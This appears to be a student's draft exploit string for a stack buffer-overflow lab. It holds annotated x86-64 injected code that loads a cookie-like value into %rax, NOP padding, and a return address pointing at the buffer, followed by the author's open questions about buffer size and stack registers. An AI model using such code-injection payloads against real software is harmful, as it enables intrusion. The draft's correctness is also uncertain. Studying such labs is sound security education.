54                   	/* push   %rsp */ 
55                   	/* push   %rbp */ 
48 89 e5             	/* mov    %rsp,%rbp */ 
48 83 ec 20          	/* sub    $0x20,%rsp */ 
48 c7 c0 ed 24 25 62 	/* mov    $0x622524ed,%rax */ 
5c                   	/* pop    %rsp */ 
5d                   	/* pop    %rbp */ 
c3                   	/* retq */ 
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 
a0 10 40 00 00 00 00 00 /* <address of beginning of buffer> */

 /* questions: */  
 /* - how big is buffer? */ 
 /* - what is buffer starting address? */ 
 /* - correct how it do rsp and rbp? */ 
